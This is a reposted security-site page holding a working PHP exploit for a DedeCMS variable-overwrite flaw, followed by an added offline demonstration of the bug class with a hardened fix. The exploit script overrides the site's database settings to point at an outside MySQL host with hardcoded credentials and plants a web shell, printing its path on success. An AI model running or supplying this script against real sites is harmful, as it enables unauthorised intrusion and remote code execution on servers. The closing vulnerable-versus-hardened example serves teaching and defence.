DedeCMS (织梦) variable-overwrite (变量覆盖) 0day getshell

Test method:

@Sebug.net
The programs (methods) provided on this site may be offensive in nature and are for security research and teaching only; use them at your own risk!
#!/usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\n";
if (!isset($argv[2])) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
  aid=1  shell path: /data/cache
  aid=2  shell path: /
  aid=3  shell path: /plus/
Example:
  php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
    exit;
}
$url  = $argv[1];                          // target host, no scheme (handed to fsockopen)
$aid  = $argv[2];                          // selects where the cached tag (the shell) lands
$path = isset($argv[3]) ? $argv[3] : '';   // sub-directory DedeCMS is installed in
$exp  = Getshell($url, $aid, $path);
// Getshell() returns only the HTTP status line. In "HTTP/1.1 200 OK" the
// substring "OK" starts at offset 13, so this is effectively a "got 200 OK" check.
if (strpos($exp, "OK") > 12) {
    echo "[*] Exploit Success\n";
    if ($aid == 1) echo "[*] Shell: ".$url."/$path/data/cache/fuck.php\n";
    if ($aid == 2) echo "[*] Shell: ".$url."/$path/fuck.php\n";
    if ($aid == 3) echo "[*] Shell: ".$url."/$path/plus/fuck.php\n";
} else {
    echo "[*] Exploit Failed\n";
}

function Getshell($url, $aid, $path) {
    $id   = $aid;
    $host = $url;
    $port = "80";
    // POST body. The _COOKIE[GLOBALS][cfg_*] parameters override DedeCMS's
    // database settings (host, user, password, database, table prefix) with an
    // external MySQL host and credentials, so plus/mytag_js.php fetches the tag
    // row for the given aid from that server instead of the site's own database.
    // nocache=true forces the tag to be re-read and re-cached. %CC%E1%BD%BB is
    // "提交" (Submit) in GB2312.
    $content = "doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1"
             ."&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114"
             ."&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit"
             ."&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec"
             ."&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit"
             ."&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_"
             ."&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
    $data  = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
    $data .= "Host: ".$host."\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
    //$data .= "Accept-Encoding: gzip,deflate\r\n";
    $data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
    $data .= "Connection: keep-alive\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Content-Length: ".strlen($content)."\r\n\r\n";   // blank line ends the headers
    $data .= $content;
    $ock = fsockopen($host, $port);
    if (!$ock) {
        echo "[*] No response from ".$host."\n";
        return '';
    }
    fwrite($ock, $data);
    // Read just the status line; the caller checks it for "200 OK".
    $status = feof($ock) ? '' : fgets($ock, 1024);
    fclose($ock);
    return $status;
}
?>
Source: http://sebug.net/vuldb/ssvid-20949
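The request above works because the application registers request keys as global variables ("variable coverage", i.e. variable overwrite) and its name check does not look inside nested arrays. The following is an added illustration of that bug class, not DedeCMS's source and not code from the Sebug advisory: a minimal register-as-globals loop of the same shape, then a hardened form. The regexes, the address 203.0.113.10 and the parameter names other than aid and cfg_dbhost are assumptions; the page's payload nests one level deeper (under GLOBALS), and the exact DedeCMS code path is not reproduced here. It runs offline from the CLI because the superglobals are filled by hand with constructed input.

```php
<?php
// Added illustration of the variable-overwrite pattern; not DedeCMS code.
// Constructed attacker input: the top-level name shadows the $_COOKIE
// superglobal, and the forbidden "cfg_" name sits one level down.
$attack = array('aid' => '1', '_COOKIE' => array('cfg_dbhost' => '203.0.113.10'));
$benign = array('aid' => '1');

// ----------------------------------------------------------------------
// Vulnerable pattern (same shape as older PHP CMS "register globals" loops)
// ----------------------------------------------------------------------
$_GET = $attack; $_POST = array(); $_COOKIE = array(); $_REQUEST = $attack;
$cfg_dbhost = 'localhost';   // the site's real configuration value

// Step 1: forbid dangerous names, but only among the TOP-LEVEL keys of the
// request as received. "_COOKIE" matches neither cfg_ nor GLOBALS, so it passes.
foreach ($_REQUEST as $k => $v) {
    if (preg_match('/^(cfg_|GLOBALS)/i', $k)) {
        exit("Request var not allow!\n");
    }
}

// Step 2: register every request key as a global variable (variable-variables
// at file scope write the global symbol table). The "_GET" pass executes
// ${'_COOKIE'} = array('cfg_dbhost' => '203.0.113.10'), replacing the $_COOKIE
// superglobal with attacker data; the "_COOKIE" pass then walks that replaced
// array and executes ${'cfg_dbhost'} = '203.0.113.10'. Nothing re-checks names.
foreach (array('_GET', '_POST', '_COOKIE') as $req) {
    foreach ($$req as $k => $v) {
        ${$k} = $v;
    }
}
printf("vulnerable loop: cfg_dbhost = %s\n", $cfg_dbhost);   // 203.0.113.10

// ----------------------------------------------------------------------
// Hardened form
// ----------------------------------------------------------------------

// (a) Validate names at every nesting level, and also forbid names that
//     shadow the superglobals themselves (assumed blocklist). Returns false
//     instead of exiting so the caller decides how to fail.
function request_keys_ok(array $a)
{
    foreach ($a as $k => $v) {
        if (is_string($k) && preg_match('/^(cfg_|GLOBALS|_[A-Z]+$)/', $k)) {
            return false;
        }
        if (is_array($v) && !request_keys_ok($v)) {
            return false;
        }
    }
    return true;
}

// (b) Never turn request keys into variable names. Read each parameter the
//     script needs by explicit name, from the array it must come from, with a
//     cast; configuration lives in its own variables and is never writable
//     from the request.
function get_int_param(array $src, $name, $default = 0)
{
    return array_key_exists($name, $src) ? (int) $src[$name] : $default;
}

foreach (array('attack' => $attack, 'benign' => $benign) as $label => $input) {
    $_GET = $input; $_POST = array(); $_COOKIE = array(); $_REQUEST = $input;
    $cfg_dbhost = 'localhost';
    if (!request_keys_ok($_REQUEST)) {
        printf("hardened (%s): request rejected, forbidden key at a nested level\n", $label);
    } else {
        $aid = get_int_param($_GET, 'aid');
        printf("hardened (%s): aid=%d accepted\n", $label, $aid);
    }
    printf("hardened (%s): cfg_dbhost = %s\n", $label, $cfg_dbhost);   // localhost
}
```

Run it with `php demo.php`: the vulnerable loop reports cfg_dbhost as 203.0.113.10, while the hardened path rejects the attack input, accepts the benign one, and leaves cfg_dbhost at localhost in both cases. The two fixes are independent: the recursive check closes the nesting bypass, and dropping variable-variables removes the reason the check had to exist at all.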
Original article: https://www.cnblogs.com/milantgh/p/3615939.html